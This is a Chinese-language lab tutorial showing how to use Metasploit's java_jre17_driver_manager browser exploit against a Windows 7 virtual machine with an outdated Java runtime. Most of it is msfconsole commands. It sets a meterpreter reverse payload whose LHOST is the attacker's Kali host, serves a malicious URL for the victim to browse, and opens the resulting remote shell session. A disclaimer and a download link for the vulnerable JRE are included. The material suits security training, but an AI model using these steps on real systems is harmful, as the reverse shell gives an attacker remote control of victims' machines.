目录
(2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell
Metasploitable2-linux:靶机 192.168.234.8
kali-debian:攻击机 192.168.234.141
win7 虚拟机:靶机 192.168.234.158
在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!
基于 java 环境的漏洞利用获取 shell
总结:
(1)使用exploit/multi/browser/java_jre17_driver_manager模块,设置payload为/java/meterpreter/reverse_http,并开启监听
===》生成http链接
(2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell
注意需要启动apache服务器才能运行
注:为什么必须启用apache服务?
木马和病毒都是封装在http数据包(通过http进行下载安装),apache服务器是解析http数据包,木马文件封装在响应里返回给用户(靶机) ==》所以需要启用apache服务器来用于解析数据包
搭建 java 环境
第一步我们先安装 java 环境上传 jre 到 win7 或 xp 操作系统
注:通过此案例,告诉大家,软件升级还是很重要的
若无法下载或者没有资源、无法访问,可直接在百度网盘接收文件
链接:https://pan.baidu.com/s/1qNWy8BWilBPoTZRXgx5WdQ?pwd=04sz
提取码:04sz
(1)实战-使用 java 模块 getshell
root@zwzj:~# systemctl start apache2 ——启动kali 自带 apache 服务器
msf6 > use exploit/multi/browser/java_jre17_driver_manager
msf6 exploit(multi/browser/java_jre17_driver_manager) > show options
注:看到这里 target 是一个通用的 java payload。 我们可以自己指定一个
msf6 exploit(multi/browser/java_jre17_driver_manager) > show payloads
——查看此java模块可以使用的 payload
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload /java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.234.141
msf6 exploit(multi/browser/java_jre17_driver_manager) > jobs -K
——K必须大写 ——删除所有监听
msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit
(2)win7 安装java环境,并浏览生成的http连接 ==》kali得到shell
win7 主机访问http://192.168.234.141:8080/9p3pDdb
——win7需要配置远程连接端口为4444
提示我们 java 版本需要更新我们点击 later 先不更新
然后发现win7运行了一个 java 程序,但是用户关闭了 java 程序也不影响我们 session 的正常访问。
回到 MSF 控制台
Session 已经建立
msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 1 --开启指定会话
meterpreter > getuid
Server username: root